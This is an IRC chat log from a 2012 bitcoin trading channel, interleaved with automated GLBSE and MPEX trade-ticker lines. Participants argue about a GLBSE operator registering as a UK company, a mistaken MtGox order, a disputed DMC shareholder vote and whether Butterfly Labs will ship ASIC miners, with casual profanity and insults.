Sep 18 15:44:02 [MPEX] [O.BTCUSD.P140T] 460 @ 0.25713953 = 118.2842 BTC [-] Sep 18 15:46:06 [GLBSE] [BIB.BVPS] 179 @ 0.00445 = 0.7966 BTC [-] Sep 18 15:51:03 [GLBSE] [GIGAMINING] 4 @ 0.61499999 = 2.46 BTC [+] Sep 18 15:51:04 [GLBSE] [GIGAMINING] 100 @ 0.615 = 61.5 BTC [+] Sep 18 16:08:04 Is there a mistake in this or am I just not reading it right? Sep 18 16:08:11 FREE UPGRADE: This is a one for one swap of GIGAMINING for the bond. Sep 18 16:08:13 PAID UPGRADE: This is a one to four swap of GIGAMINING for the bond. A payment of .29 BTC per GIGAMINING bond is also required Sep 18 16:11:02 [MPEX] [F.GIGA.ETF] 2421 @ 0.00028942 = 0.7007 BTC [-] Sep 18 16:11:04 [MPEX] [F.GIGA.ETF] 8908 @ 0.00028796 = 2.5651 BTC [-] Sep 18 16:11:05 [MPEX] [F.GIGA.ETF] 3971 @ 0.00028777 = 1.1427 BTC [-] Sep 18 16:17:02 [MPEX] [S.MPOE] 46200 @ 0.00040699 = 18.8029 BTC [+] Sep 18 16:17:04 [MPEX] [S.MPOE] 12056 @ 0.00040699 = 4.9067 BTC [+] Sep 18 16:17:05 [MPEX] [S.MPOE] 7638 @ 0.00040699 = 3.1086 BTC [+] Sep 18 16:17:06 [MPEX] [S.MPOE] 41289 @ 0.00040699 = 16.8042 BTC [+] Sep 18 16:17:07 [MPEX] [S.MPOE] 38817 @ 0.00040699 = 15.7981 BTC [+] Sep 18 16:17:08 [MPEX] [S.MPOE] 42633 @ 0.00040699 = 17.3512 BTC [+] Sep 18 16:17:10 [MPEX] [S.MPOE] 25700 @ 0.00040699 = 10.4596 BTC [+] Sep 18 16:17:11 [MPEX] [S.MPOE] 48231 @ 0.00040699 = 19.6295 BTC [+] Sep 18 16:17:12 [MPEX] [S.MPOE] 40400 @ 0.00040699 = 16.4424 BTC [+] Sep 18 16:17:13 [MPEX] [S.MPOE] 1500 @ 0.00040699 = 0.6105 BTC [+] Sep 18 16:17:14 [MPEX] [S.MPOE] 23985 @ 0.000407 = 9.7619 BTC [+] Sep 18 16:17:14 im not sure, i know he has two differnt options for things Sep 18 16:17:15 [MPEX] [S.MPOE] 22900 @ 0.00040701 = 9.3205 BTC [+] Sep 18 16:17:16 [MPEX] [S.MPOE] 45700 @ 0.00040702 = 18.6008 BTC [+] Sep 18 16:17:17 [MPEX] [S.MPOE] 3796 @ 0.00040708 = 1.5453 BTC [+] Sep 18 16:17:18 [MPEX] [S.MPOE] 12400 @ 0.00040722 = 5.0495 BTC [+] Sep 18 16:17:19 [MPEX] [S.MPOE] 60100 @ 0.00040743 = 24.4865 BTC [+] Sep 18 16:17:20 [MPEX] [S.MPOE] 10000 @ 0.00040892 = 4.0892 BTC [+] Sep 18 16:17:21 [MPEX] [S.MPOE] 18700 @ 0.00040982 = 7.6636 BTC [+] Sep 18 16:17:22 [MPEX] [S.MPOE] 33600 @ 0.00041693 = 14.0088 BTC [+] Sep 18 16:17:23 [MPEX] [S.MPOE] 4864355 @ 0.00042 = 2043.0291 BTC [+] Sep 18 16:18:00 lol i hatethis spam, like someone really bought 2000 btc worth of that crap. Sep 18 16:19:27 apparently they did Sep 18 16:19:37 someone did like 20k the other week Sep 18 16:19:38 it happens Sep 18 16:19:48 there are people on mpex with ungodly amounts of btc Sep 18 16:19:59 smoovious: now that is a definitely possibility Sep 18 16:20:03 one person with a lot of btc Sep 18 16:20:50 [GLBSE] [SILVER] 6 @ 0.00999999 = 0.06 BTC [+] Sep 18 16:21:03 [MPEX] [O.BTCUSD.P110T] 11 @ 0.06317974 = 0.695 BTC [-] Sep 18 16:26:14 lol Chaang-Noi finds it difficult to swallow. Sep 18 16:27:15 yeah pretty sure it is the same person trading fake btc back and forth Sep 18 16:27:30 no one in their right mind would make these trades, they are fake. Sep 18 16:30:07 hahahaha Sep 18 16:37:50 some funny business at MtGox right now Sep 18 16:38:04 hm? Sep 18 16:39:06 well it's weird Sep 18 16:39:17 I made a deposit to mtgox last night, early this morning Sep 18 16:39:19 100BTC Sep 18 16:39:29 then went to sleep cause I wasnt going to wait for the confirmations Sep 18 16:39:39 you should have used smpake.com Sep 18 16:39:40 woke up this afternoon to find said BTC had been sold Sep 18 16:40:07 [GLBSE] [NYAN.B] 16 @ 0.99 = 15.84 BTC [+] Sep 18 16:40:13 wahoo, did you contact their support? did they had an explanation? Sep 18 16:40:16 I don't remember putting anything up for sale Sep 18 16:40:22 no I haven't Sep 18 16:40:24 or were you drunk? :D Sep 18 16:40:30 no I don't drink Sep 18 16:40:39 but I do wonder if I was sleep walking or something Sep 18 16:40:47 that would be really weird Sep 18 16:40:54 stock exchange operator by day Sep 18 16:41:03 mysterious trader by night Sep 18 16:41:16 imho you had an open order Sep 18 16:41:40 they wont show or at least didnt if the funds werent there (at least with partials) Sep 18 16:41:43 nefario Sep 18 16:41:47 check the deposit time Sep 18 16:41:49 and trade time Sep 18 16:42:04 yeah probably closely related Sep 18 16:42:15 but how could I have an open order without funds Sep 18 16:42:17 meh Sep 18 16:42:25 you can set up an order Sep 18 16:42:28 send fund later Sep 18 16:42:31 it will get executed Sep 18 16:42:39 I see Sep 18 16:42:54 also, use smpake next time :p Sep 18 16:43:14 nefario check the logs Sep 18 16:43:34 however mtgox has all sorts of weird shit. people ahve had btc moved from their account with out anyone being logged in Sep 18 16:43:40 i would never used mtgox Sep 18 16:43:45 use* Sep 18 16:44:02 yeah I see it there Sep 18 16:44:04 an open order Sep 18 16:44:06 lol Sep 18 16:44:11 lol Sep 18 16:44:15 Chaang-Noi: kind of have no choice right now Sep 18 16:44:18 well buy them back take the loss? Sep 18 16:44:27 with intersango not able to do uk accounts Sep 18 16:44:31 no Sep 18 16:44:34 yeah dont use intersango Sep 18 16:44:35 I wanted to change them Sep 18 16:44:40 sucks there are not more options Sep 18 16:45:06 eh? Sep 18 16:45:12 hmmm Sep 18 16:45:17 also didn't get the best rate Sep 18 16:45:20 you cant set up an order if you dont have btc, iv done it before, but this was ages ago Sep 18 16:45:44 bought two yubikeys yesterday Sep 18 16:45:53 going to add mtgox and regular yubikeys to GLBSE Sep 18 16:46:00 are you people high Sep 18 16:46:05 lol Sep 18 16:46:13 you can add as many orders with 0 balance Sep 18 16:46:21 i agree Sep 18 16:46:21 they will get exectued if market allows Sep 18 16:46:25 when funds come in Sep 18 16:46:27 kakobrekla: whats the name of your site? bukakke.com? Sep 18 16:46:28 usd or coin Sep 18 16:46:35 yes nefario, thats it Sep 18 16:46:40 no really Sep 18 16:46:42 what is the name Sep 18 16:46:46 smpake.com Sep 18 16:47:01 thanks Sep 18 16:47:02 [MPEX] [F.GIGA.ETF] 8900 @ 0.00028777 = 2.5612 BTC [-] Sep 18 16:48:00 so sad Sep 18 16:48:06 couldn't go to vlads BBQ Sep 18 16:48:12 bastards been putting pics up Sep 18 16:48:24 fucking lobbster and everything Sep 18 16:48:36 url Sep 18 16:50:19 https://bitcointalk.org/index.php?topic=67199.340;topicseen Sep 18 16:51:56 [GLBSE] [YARR] 70 @ 1 = 70 BTC [-] Sep 18 16:52:22 one pic. Sep 18 16:52:26 [GLBSE] [ASICMINER] 34 @ 0.1171 = 3.9814 BTC [-] Sep 18 16:52:27 of the food. Sep 18 16:52:27 [GLBSE] [ASICMINER] 75 @ 0.117 = 8.775 BTC [-] Sep 18 16:52:30 meh Sep 18 16:53:00 sup Sep 18 16:55:27 i could have sent you the 200 btc from my glbse account if you asked Sep 18 16:55:38 would ahve been faster Sep 18 16:56:21 i wanta smoke a cigar... Sep 18 16:56:50 usagi ill fix that :p Sep 18 16:58:50 [GLBSE] [NYAN.B] 10 @ 0.99999997 = 10 BTC [+] Sep 18 17:00:04 [GLBSE] [GIGAMINING] 1 @ 0.6189 BTC [+] Sep 18 17:00:19 So I'm thinking of adding a verification fee for those who want to get verified Sep 18 17:00:24 was thinking 60BTC Sep 18 17:00:42 lol Sep 18 17:00:49 you dont want people to be verrified eh? Sep 18 17:01:09 you should do it the other way, 60 btc for people who do not want to be verrified and list an asset... Sep 18 17:01:27 what is your logic nefario? Sep 18 17:01:43 someone else will be able to provide it better and cheaper Sep 18 17:02:06 different levels of verification Sep 18 17:02:14 [GLBSE] [BITBOND] 1 @ 0.33 BTC [+] Sep 18 17:02:23 Im talking about what is currently available Sep 18 17:02:26 mpex partly failed cuz retarded fees, if you add a retarded fee, no one will be verifiedand no one will be trusted. Sep 18 17:03:14 higher levels include background checks Sep 18 17:03:14 no way in hell i would pay 60 btc to get verified if you are talking back ground checks... Sep 18 17:03:26 and in-person meeting and verification of ID Sep 18 17:03:39 you demand a lot nefario for glbse not being a real company or your id being made public :/ Sep 18 17:03:45 Chaang-Noi: the point is to encourage someone else to come along and offer something better Sep 18 17:04:08 Chaang-Noi: we are a real company, I'm meeting lawyers tomorrow Sep 18 17:04:12 yeah all you would do is force people to not be verrified. Sep 18 17:04:16 and my ID is public Sep 18 17:04:17 [GLBSE] [BFLS.RIG] 1 @ 0.899 BTC [+] Sep 18 17:04:26 i ahve never meet you nefario :/ Sep 18 17:04:31 not my fault Sep 18 17:04:35 :) Sep 18 17:04:36 you didn't come to bitcoin2012 Sep 18 17:04:41 I was there 2 days Sep 18 17:04:46 damn near talked to everyone Sep 18 17:04:51 spoke as well Sep 18 17:05:08 no, i would not support anything intersango until that mess is cleared up. Sep 18 17:05:16 your loss Sep 18 17:05:28 maybe, maybe not. Sep 18 17:05:33 [GLBSE] [YABMC] 2 @ 0.098 = 0.196 BTC [-] Sep 18 17:05:36 so more about this real compnay Sep 18 17:05:37 it's wasn't supporting intersango, it was supporting bitcoin Sep 18 17:05:49 Chaang-Noi: I can't really give you more details Sep 18 17:05:55 how can you be a real company and do what you are doing? Sep 18 17:06:09 this seems pretty grey area... Sep 18 17:06:10 [GLBSE] [BFLS.RIG] 1 @ 0.899 BTC [+] Sep 18 17:06:26 this is why Im talking to a lawyer Sep 18 17:06:32 get the details sorted out Sep 18 17:06:48 i really dont think this is a good idea Sep 18 17:06:50 Im on a mission Sep 18 17:06:55 dont rush it Sep 18 17:07:12 i dont want mpex to be the only usable exchange... Sep 18 17:07:21 if you have to do aml and all that other bs it will kill you. Sep 18 17:08:08 [GLBSE] [PUREMINING] 1 @ 0.09684999 BTC [+] Sep 18 17:08:11 and use the word "usable" extreamly liberally when i say usable about mpex Sep 18 17:08:32 Chaang-Noi: you're over reacting Sep 18 17:08:42 i might be, i dont know Sep 18 17:08:51 i tend to react when there are unknowns Sep 18 17:09:00 I'm getting feedback on the idea of having verification as something separate from GLBSE Sep 18 17:09:12 Chaang-Noi: you freak out when anything changes Sep 18 17:09:28 thats over reacting Sep 18 17:09:30 [GLBSE] [GIGAMINING] 1 @ 0.6189 BTC [+] Sep 18 17:09:33 [GLBSE] [YARR] 2 @ 1 = 2 BTC [-] Sep 18 17:09:35 yes, when i dont know what is going on i defend. Sep 18 17:09:40 and why not? Sep 18 17:09:47 better safe than sorry Sep 18 17:10:06 as soon as you register i might be breaking lawsin englans i was not before Sep 18 17:10:08 but how can you defend when you don't know whats happening Sep 18 17:10:24 just get out. have you void all my assets. Sep 18 17:10:24 look, GLBSE is a real company Sep 18 17:10:28 we make real profits Sep 18 17:10:29 [GLBSE] [YARR] 1 @ 1 BTC [-] Sep 18 17:10:33 have a real revenue stream a Sep 18 17:10:37 and a vision Sep 18 17:10:44 [GLBSE] [OBSI.HRPT] 9 @ 0.1029 = 0.9261 BTC [-] Sep 18 17:10:46 for anyone to be able to take part in the market Sep 18 17:10:47 but you want to now be regulated by england? Sep 18 17:10:53 for giving or getting funding Sep 18 17:10:57 am i breaking english laws? i dont know Sep 18 17:11:03 Chaang-Noi: we're not being regulated Sep 18 17:11:11 then what are you doing? Sep 18 17:11:19 registering as a company Sep 18 17:11:34 [GLBSE] [ASICMINER] 1 @ 0.11867999 BTC [+] Sep 18 17:11:49 but current financial legislation doesn't apply to bitcoin related businesses Sep 18 17:12:14 it's monopoly money as far as they're concerned Sep 18 17:12:18 and we will all be breaking the law over night when some law gets passed we dont know about until after... Sep 18 17:12:41 Chaang-Noi: laws don't get passed in the middle of teh night behind closed doors here Sep 18 17:12:46 they have to pass through parliament Sep 18 17:12:59 which means we'll see it coming down the road years before Sep 18 17:13:02 [MPEX] [F.GIGA.ETF] 3229 @ 0.00028777 = 0.9292 BTC [-] Sep 18 17:13:03 [MPEX] [F.GIGA.ETF] 5105 @ 0.00028713 = 1.4658 BTC [-] Sep 18 17:13:04 im pretty srue if you go this path i will not want to have assets listed on glbse unless i full understand what is going on. Sep 18 17:13:33 do you think I have any alternative path? Sep 18 17:13:38 am i over reacting? maybe... Sep 18 17:13:42 nefario, what is the need for this Sep 18 17:13:43 if I don't register as a company Sep 18 17:13:47 the profits are in btc Sep 18 17:13:49 what do you want to gain by registereing with the english govt? Sep 18 17:13:58 I have to pay rent and food in GBP Sep 18 17:14:07 lack of personal responsibility? Sep 18 17:14:09 means BTC needs to be changed for GBP Sep 18 17:14:15 seems like a reasonable reason to make a company Sep 18 17:14:19 which means I need pay tax on that Sep 18 17:14:32 on monopoly money? Sep 18 17:14:39 well, not lack, but limited Sep 18 17:14:43 im not sure how it works in england but i do not need to have a company to pay taxes on income i make in btc... Sep 18 17:14:45 it also adds, as copumpkin has said a level of responsibilitiy Sep 18 17:14:53 Chaang-Noi: you do here Sep 18 17:14:58 either you work for someone Sep 18 17:15:00 or Sep 18 17:15:01 it adds a lot of things. Sep 18 17:15:05 you have a company Sep 18 17:15:09 i tell my accountant i traded internet money and made this much, then they take a cut... Sep 18 17:15:20 they don't care about internet money Sep 18 17:15:24 they care about GBP Sep 18 17:15:29 in the usa you can trade stocks and gold with out having a company to do it... Sep 18 17:15:31 which is viewable in my bank account Sep 18 17:15:46 in the UK you need to register as self employed Sep 18 17:15:52 nefario im going to call BS you do not need to register glbse as a company to pay taxes, you can find a differnt way to pay taxes. Sep 18 17:16:05 how Sep 18 17:16:37 in england people who do odd jobs, how do they declair their income? Sep 18 17:16:44 like handy man and yard cutters? Sep 18 17:16:46 as self employed Sep 18 17:16:50 they register Sep 18 17:16:53 as self employed Sep 18 17:16:57 then do that. but keep glbse out of it. Sep 18 17:16:57 i.e. as a business Sep 18 17:17:06 gains from personal currency trading are not taxed in eu Sep 18 17:17:16 now you are taking the money from fees Sep 18 17:17:18 not trading Sep 18 17:17:19 he's not personally trading currency Sep 18 17:17:20 yeah Sep 18 17:17:21 but Sep 18 17:17:28 who can tell comming from gox Sep 18 17:17:44 with enough revenue, he's gonna get scrutinized Sep 18 17:17:54 you don't want to get shut down Sep 18 17:17:54 and GLBSE revenue is growing Sep 18 17:17:56 i understand you want to pay taxes, and be legal on that. that is good, but you dont need to register glbse as a company. Sep 18 17:18:01 dunno, i have done 10k eur last year, and more than that this year Sep 18 17:18:04 I dont want to pay taxes Sep 18 17:18:06 I have to Sep 18 17:18:10 Chaang-Noi: you keep repeating that, knowing nothing of the situation in the UK Sep 18 17:18:11 noone is chasing me - yet :) Sep 18 17:18:14 also, limited liability Sep 18 17:18:16 has anyone heard of that? Sep 18 17:18:29 Chaang-Noi: being self employed means being registered as a company Sep 18 17:18:41 self employed means full liability as well Sep 18 17:18:48 limited liability would be a reason to register, however that calls for some regulation of this stuff i would assume. Sep 18 17:19:19 limited liability is an awfully good reason to register, when you're dealing with big loads of other people's money :) Sep 18 17:19:31 llc means the company needs to be run a specific way, with accounting and auditing, but not regulation of the actual business Sep 18 17:19:51 yes, i would find that point valid however i am still worried about working with a legal company in england listed bonds and assets... Sep 18 17:20:07 yeah, it's kinda uncharted territory :) Sep 18 17:20:15 exactly Sep 18 17:20:20 uncharted territory Sep 18 17:20:23 which is risky/scary/whatever Sep 18 17:20:25 i dont want to be the test case. Sep 18 17:20:31 then dont be Sep 18 17:20:35 id rather just not have assets. Sep 18 17:20:37 whole bitcoin is a test case. Sep 18 17:20:39 then dont Sep 18 17:20:39 you will void my assets? Sep 18 17:20:47 no Sep 18 17:20:54 [GLBSE] [TYGRR.BOND-P] 46 @ 0.0505 = 2.323 BTC [-] Sep 18 17:20:55 they you want me to just walk away? Sep 18 17:20:56 thats your decision Sep 18 17:21:12 if you don't want to be involved then what the can I do Sep 18 17:21:22 Smoovious: wrong Sep 18 17:21:35 I wouldn't be registering if that was the case Sep 18 17:21:52 i kinda think smoovious might be right. Sep 18 17:21:57 no he's not Sep 18 17:22:00 or if he is not right now, he will be some day. Sep 18 17:22:03 register in somalia Sep 18 17:22:11 then we'll have to wait until that day Sep 18 17:22:20 yes register in somalia... or cambodia... Sep 18 17:22:24 laos! Sep 18 17:22:37 i honestly looked into registering a bitcoin exchange in cambodia Sep 18 17:22:45 when i was looking to set up my own exchange Sep 18 17:22:57 that way i can be unregulated Sep 18 17:23:10 Smoovious: the FSA has already said that bitcoin denominated exchanges don't come under their regulatory umbrella Sep 18 17:23:13 i would never sign up in the usa Sep 18 17:23:36 im not worried about it traded as a currancy Sep 18 17:23:40 im worried about trading bonds and assets Sep 18 17:24:03 well thats the case for everything Sep 18 17:24:08 but by then we'll be bigger Sep 18 17:24:15 bigger than FSA Sep 18 17:24:20 can you sell unregulated bonds and stocks in england and price it in gold to get out of the rules??? i highly doubt it Sep 18 17:24:27 yes kakobrekla, bigger than the FSA Sep 18 17:24:32 Smoovious: that's mostly individual countries with high tax evasion though Sep 18 17:24:34 like italy :) Sep 18 17:24:44 (if you mean banning large cash transactions, etc.) Sep 18 17:24:48 selling bonds in pounds, and gold and bitcoin needs to follow the same rules... Sep 18 17:24:57 Chaang-Noi: not really Sep 18 17:25:01 glbse might not be illegal but i bet many of the assets on glbse are Sep 18 17:25:04 also, moo Sep 18 17:25:07 or will become illegal overnight Sep 18 17:26:17 I have that privaledge Sep 18 17:26:35 what if pirate turns out to be a ponzi, or there is a ponzi later on and glbse has that stuff on it.. that will be bad cuz the govt will go after you nefario (if england is anything like the usa) Sep 18 17:26:54 16:26.35 ( Chaang-Noi ) what if pirate turns out to be a ponzi, Sep 18 17:26:58 they go after NYSE if a company listed there is found to be fraudulent? Sep 18 17:27:00 were you frozen for last couple of weeks? Sep 18 17:27:00 lol Sep 18 17:27:11 what if Sep 18 17:27:17 although nefario is kind of overstepping the typical exchange boundaries Sep 18 17:27:23 this is like a room of scary people chasing nefario into the corner Sep 18 17:27:28 =) Sep 18 17:27:29 if nyse listed a company that did not follow the regulated rules yes copumkin they very much do Sep 18 17:27:41 eebi jeebies! Sep 18 17:27:43 so it might end up being something like the safe harbor crap on the internet Sep 18 17:27:46 Lucidize: I put on my robe and wizard hat Sep 18 17:27:57 keep them at bay! Sep 18 17:27:58 Smoovious: yeah, certainly that Sep 18 17:28:21 I just mean it wouldn't necessarily shut down the entire exchange Sep 18 17:28:29 if NYSE assisted a company not fully following regulations NYSE gets fined big money Sep 18 17:28:34 but since glbse isn't a traditional exchange structure, it might have more responsibility Sep 18 17:28:50 if 90% of assets on glbse are "illegal" then glbse is pretty dead Sep 18 17:28:50 who the fuck is matthewh3? Sep 18 17:29:01 is he a scammer or just retarded? Sep 18 17:29:14 Diablo-D3: good morning sweetie! Sep 18 17:29:14 He lives in Manchester Sep 18 17:29:16 I've met him Sep 18 17:29:23 cool guy Sep 18 17:29:24 [GLBSE] [YARR] 3 @ 1 = 3 BTC [-] Sep 18 17:29:24 look I'm just offering your share holders a third option. Sep 18 17:29:31 oh christ hes in here Sep 18 17:29:35 OMG DRAMA TIME Sep 18 17:29:36 matthewh3: stop spamming the dmc with your bullshit Sep 18 17:29:44 ... Sep 18 17:29:51 back to reading about the russian rev... Sep 18 17:29:54 Diablo-D3: HIS bullshit? so yours is ok? Sep 18 17:29:59 best of luck nefario, hope it works out. Sep 18 17:30:06 like two bitches wearing the same dress to the prom Sep 18 17:30:28 toffoo: *girls? Sep 18 17:30:51 [GLBSE] [OBSI.HRPT] 6 @ 0.1029 = 0.6174 BTC [-] Sep 18 17:30:54 Smoovious: come at me bro Sep 18 17:30:54 nefario: you've yet to prove any such things. Sep 18 17:30:59 believe it or not, bitches and girls are not interchangeable terms! Sep 18 17:31:04 ja I got a lot of this at the conference Sep 18 17:31:17 had someone offer me citizen ship of a small country if I want to dissapear Sep 18 17:31:21 copumpkin: neither are women, so I dunno about that Sep 18 17:31:33 If DMC was going to liquidise or change CEO I'm just offering the shareholders options. If not and they have confidence on you to stay no harm done or no loss by any party. Sep 18 17:31:57 nefario the new assange Sep 18 17:32:09 Im not like assange Sep 18 17:32:22 even starts with ass. Sep 18 17:32:22 don't even put me on his pedastal Sep 18 17:32:25 matthewh3: you're offering to fuck over the shareholders and get overly obsessed with mining Sep 18 17:32:38 Diablo-D3: it's up to the shareholders Sep 18 17:32:54 nefario: yes, and they've clearly voted against you Sep 18 17:33:07 have they? Sep 18 17:33:12 votes not over Sep 18 17:33:23 even usagi voted against you Sep 18 17:33:39 I can't really comment on that Sep 18 17:34:01 your face voted against you! Sep 18 17:34:02 RSM is looking to expand into buy into GLBSE investment funds and good organically growing mining stocks. Sep 18 17:34:17 matthewh3: scam your own investors on your own time Sep 18 17:34:34 everyone is always so pleasant around here Sep 18 17:34:44 trying to resolve things peacefully and professionally Sep 18 17:35:14 peaceful and professional, that is the bitcoin way! :) Sep 18 17:35:29 I propose we rename the community into Peaceful, Pleasant, and Professional Sep 18 17:35:39 usagi: really? Sep 18 17:35:39 the Three Ps of bitcoin Sep 18 17:36:00 copumpkin: the community of peace. sure. Sep 18 17:36:16 how can I scam my own investors when I run the company for just 5% of stocks and invested much more than into with my own money Sep 18 17:36:46 I agreed to a contract change that closes every loophole the trolls are abusing Sep 18 17:37:00 nefario: you have no choice to backdown and allow the shareholders to vote on it Sep 18 17:37:05 *but to Sep 18 17:37:43 usagi: why would anyone vote to throw away their money? Sep 18 17:37:57 and no, its not a shareholder motion. Sep 18 17:38:01 its a nefario motion Sep 18 17:38:08 or we could call it the f(x) = 1/x community Sep 18 17:38:11 hes not acting on behalf of any shareholder no matter what he claims Sep 18 17:38:12 get it? Sep 18 17:38:13 get it? Sep 18 17:38:49 usagi: but no shareholder submitted it. Sep 18 17:39:03 [GLBSE] [GIGAMINING] 1 @ 0.6189 BTC [+] Sep 18 17:39:10 I'm just offering DMC the option to rather than liquidise to invest into RSM which I've been growing since January through the troubles of GPU>FPGA>ASIC Sep 18 17:39:13 yes, but shareholders have not been given a fair view of the facts Sep 18 17:39:14 [MPEX] [F.GIGA.ETF] 500 @ 0.00028586 = 0.1429 BTC [-] Sep 18 17:41:29 Diablo-D3: the vote won't happen until the audit has been published Sep 18 17:41:38 the person doing the audit will have their name on it Sep 18 17:41:46 I hate to tell you, but the vote already happened Sep 18 17:41:55 the majority of shares afaik voted against you Sep 18 17:42:09 I think so Sep 18 17:42:13 I wanted 3 auditirs Sep 18 17:42:18 plus, you never let the shareholders vote on who becomes the audotrs Sep 18 17:42:19 but could only get one Sep 18 17:42:32 so your audit is worthless Sep 18 17:43:19 usagi: nope Sep 18 17:43:26 infact, I put my own money into it Sep 18 17:51:37 usagi: not if its done nefario's way Sep 18 17:51:44 this has already been covered in the thread Sep 18 17:52:27 ok the vote has been re-opened Sep 18 17:52:45 as I said it won't be done until the audit has been published Sep 18 17:53:01 you never closed the vote. Sep 18 17:53:28 no Sep 18 17:53:32 the vote isn't over Sep 18 17:54:12 i dont understand how anything can be good with the management of a stock that went from 1 btc to .03 or .05 in a few months. now i dont know allthe details but most scam stocks do better than that. Sep 18 17:54:38 Chaang-Noi: because people dont understand what investing is Sep 18 17:54:45 they think glbse is some get rich quick scheme Sep 18 17:55:37 wait, why the hell did nefario reopen motion 104? Sep 18 17:56:15 i told you that.. why did you buy bond a the other day? Sep 18 17:56:27 you said you bought 100 of my bonds.. that was just silly Sep 18 17:56:37 but a minmining companying bond is not a Sep 18 17:56:41 fuck Sep 18 17:56:47 but a mining compnay is not a mining bond Sep 18 17:57:19 you assume asic-miner will ever have asic... Sep 18 17:57:30 and you assume they will pay out before the difficulty is crazy high Sep 18 17:57:37 [GLBSE] [OBSI.HRPT] 72 @ 0.1029 = 7.4088 BTC [-] Sep 18 17:57:38 the smart money would ahve kept btc in hand... Sep 18 17:58:36 usagi: btw, its closer to 0.0003 Sep 18 17:58:46 ASICMINER's largest problem is shipping before butterfly labs Sep 18 17:58:53 if they can ship at all Sep 18 17:58:57 nefario: so? Sep 18 17:59:08 what does that actually have to do with anything? Sep 18 17:59:14 BFL will have theirs shipped in october Sep 18 17:59:17 bfl most likely will never ship anyhow Sep 18 17:59:20 nefario: nope Sep 18 17:59:29 there is no proof bfl has any asics at all Sep 18 17:59:31 Diablo-D3: they certainly will Sep 18 17:59:35 nefario: prove it. Sep 18 17:59:41 infact, buy di.bflsc.success Sep 18 17:59:46 put your money where your mouth it Sep 18 17:59:49 *is Sep 18 18:00:03 BFL are the largest employers in bitcoin land Sep 18 18:00:08 20 people work there Sep 18 18:00:11 usagi: why when you could triple your money or more Sep 18 18:00:24 nefario: so why havent they taped out yet Sep 18 18:00:37 taped out? Sep 18 18:00:39 usagi: yes, but you triple your money THEN go buy bfl harware Sep 18 18:00:53 nefario: ffs, if you dont understand how the fuck hardware manufacturing works, shut up Sep 18 18:01:47 BFL have delivered on everything they said they would so far Sep 18 18:01:50 usagi: fine, remind nefario that all auditors must be voted on by the shareholders for the audit to have any validity Sep 18 18:02:03 the shareholders dont have to choose the, just agree to them Sep 18 18:02:11 *them Sep 18 18:02:33 Im not opposed to the audit, I'm opposed to the lack of transparency. Sep 18 18:02:54 Anyway I spent a few hours with josh from BFL, 2 days before the conference just chatting Sep 18 18:02:57 [GLBSE] [MERGEDMINING] 15 @ 0.07997 = 1.1996 BTC [-] Sep 18 18:03:09 well Sep 18 18:03:17 apart from the manly love making that was going on Sep 18 18:03:37 you know, when we were able to utter a few words despite the cocks in our mouths Sep 18 18:03:55 he was confident in October delivery? Sep 18 18:04:02 very Sep 18 18:04:05 fuck yes Sep 18 18:04:13 any mention of power usage? Sep 18 18:04:28 and confident that everyone would have their orders before Christmass Sep 18 18:04:31 eh Sep 18 18:04:38 late november I think Sep 18 18:04:52 so obviously first orders get theirs first, in October Sep 18 18:04:52 so they've already missed their october ship date? Sep 18 18:04:53 fail Sep 18 18:05:02 then the que works down Sep 18 18:05:07 I might as well lock di.bflsc now Sep 18 18:05:08 all will be done by november Sep 18 18:05:19 this isn't anything secret by the way Sep 18 18:05:28 he's happy to tell anyone else about it as well Sep 18 18:05:42 he sold a rig in an auction at the conference Sep 18 18:05:47 a little over 1K BTC Sep 18 18:05:57 that thing is fucking big Sep 18 18:06:01 [GLBSE] [FPGA-IPCORE-DEV] 5 @ 0.0001 = 0.0005 BTC [-] Sep 18 18:06:02 [MPEX] [F.GIGA.ETF] 11841 @ 0.00028586 = 3.3849 BTC [-] Sep 18 18:06:04 very impressive Sep 18 18:07:18 minirig I assume Sep 18 18:07:26 yea prolly Sep 18 18:07:40 they dont have shit yet Sep 18 18:08:45 what size is a minirig? Sep 18 18:09:21 Asicminer has 0 dividends right now usagi do you know that? Sep 18 18:09:54 nefario: "Our mini rig is: 17"H x 11.5"W x 18.5"D (43.18cm x 29.21 cm x 46.99 cm) and 50 lbs (22.68 KG)." Sep 18 18:10:11 Obsi: then it was a minirig Sep 18 18:10:34 difficult to get one of them in the uk tho Sep 18 18:10:48 3 months of no dividends.. and when 150 mhs does start paying dividends 150 will be wroth nothing.... Sep 18 18:10:53 its silly Sep 18 18:10:55 the logic is fail Sep 18 18:11:31 [GLBSE] [TYGRR.BOND-P] 8 @ 0.0505 = 0.404 BTC [-] Sep 18 18:11:57 http://www.butterflylabs.com/products/ <- minirig Sep 18 18:12:19 surprising it's big, if it's mini? Sep 18 18:12:32 [GLBSE] [NYAN.A] 2 @ 0.999999 = 2 BTC [+] Sep 18 18:13:35 They should make a 'platinum' rig.... a shipping container filled with 1 PHash for the miner who has everything Sep 18 18:13:35 [GLBSE] [YARR] 74 @ 1 = 74 BTC [-] Sep 18 18:14:59 lol Sep 18 18:15:17 51% :) Sep 18 18:16:06 [GLBSE] [YABMC] 3 @ 0.098 = 0.294 BTC [-] Sep 18 18:16:09 [GLBSE] [YABMC] 5 @ 0.09895 = 0.4948 BTC [+] Sep 18 18:16:11 [GLBSE] [YABMC] 7 @ 0.099 = 0.693 BTC [+] Sep 18 18:16:12 [GLBSE] [YABMC] 10 @ 0.0995 = 0.995 BTC [+] Sep 18 18:16:13 [GLBSE] [YABMC] 75 @ 0.09999999 = 7.5 BTC [+] Sep 18 18:16:23 [GLBSE] [OBSI.HRPT] 6 @ 0.102 = 0.612 BTC [-] Sep 18 18:16:24 [GLBSE] [OBSI.HRPT] 7 @ 0.1017 = 0.7119 BTC [-] Sep 18 18:16:25 [GLBSE] [OBSI.HRPT] 5 @ 0.1016 = 0.508 BTC [-] Sep 18 18:16:26 [GLBSE] [OBSI.HRPT] 9 @ 0.1014 = 0.9126 BTC [-] Sep 18 18:16:28 [GLBSE] [OBSI.HRPT] 50 @ 0.10131 = 5.0655 BTC [-] Sep 18 18:16:29 [GLBSE] [OBSI.HRPT] 99 @ 0.1013 = 10.0287 BTC [-] Sep 18 18:16:30 [GLBSE] [OBSI.HRPT] 125 @ 0.1012 = 12.65 BTC [-] Sep 18 18:16:31 [GLBSE] [OBSI.HRPT] 6 @ 0.10035 = 0.6021 BTC [-] Sep 18 18:16:32 [GLBSE] [OBSI.HRPT] 93 @ 0.1001 = 9.3093 BTC [-] Sep 18 18:16:44 [GLBSE] [BTC-MINING] 2 @ 0.97999 = 1.96 BTC [+] Sep 18 18:17:08 [GLBSE] [YARR] 40 @ 1 = 40 BTC [-] Sep 18 18:18:06 [GLBSE] 